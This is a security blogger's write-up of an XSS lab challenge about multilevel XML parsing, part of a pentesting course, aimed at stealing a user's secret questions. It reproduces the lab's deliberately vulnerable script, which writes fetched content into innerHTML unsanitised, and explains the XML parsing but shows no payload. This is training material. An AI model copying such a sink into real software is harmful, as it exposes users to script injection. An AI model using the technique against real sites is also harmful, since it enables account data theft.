XSS - Multilevel XML Parsing: JS for Pentesters task 21 write up

Nov 3, 2014 • jsp, javascript, xss, security-tube

writeup for task-21 of JS for pentesters series by security-tube - Multilevel XML parsing

We have already seen and cracked challenges that deals with Multilevel JSON and HTML parsing already. Now let us look into the 3rd one namely parsing XML.

JS for Pentesters task 21

Our objective of this challenge is to Find John’s Secret Questions+Answers using an XSS vulnerability on this page and Display the Questions+Answers in the div with id “result”. Before carrying in with the challenge, I strongly recommend you to read “Ajax: Parsing and reading XML files” for the basics on how to parse and read XML file using Ajax.

    <script>
        var request = new XMLHttpRequest();
        request.onreadystatechange = function() {
            if ((request.readyState === 4) && (request.status === 200)) {
                var endpoint = request.responseXML.getElementsByTagName('endpoint')[0].firstChild.nodeValue;
                var uid = request.responseXML.getElementsByTagName('uid-param-value')[0].firstChild.nodeValue;
                var csrf_token = request.responseXML.getElementsByTagName('token-param-value')[0].firstChild.nodeValue;
                var params = request.responseXML.getElementsByTagName('uid-param-value');    
                var req = new XMLHttpRequest();
                var url = endpoint + "?uid=" + uid + "&token=" + csrf_token;
                alert(url);
                req.open('GET', url);
                req.onreadystatechange = function() {
                    if ((req.readyState === 4) && (req.status === 200)) {
                      	var result = document.getElementById("result").innerHTML = req.responseText;
                    }
                }
                req.send()
            }
        }
        request.open('GET', '/lab/webapp/jfp/21/getxml');
        request.send();
    </script>

Since the response we get from the request is in the format XML, we use the keyword responseXML instead of responseText. From XML files, we can easily take any values we need just like accessing values from HTML files. Thats why you can see that we are accessing the values we need from the XML document using document.getElementsByTagName() which is usually used to select data from an HTML file.

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

By this, we are completing the write ups of Pentester Academy’s JavaScript for Pentesters course challenge write ups. Hope you enjoyed solving the challenges as much as we do :)

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE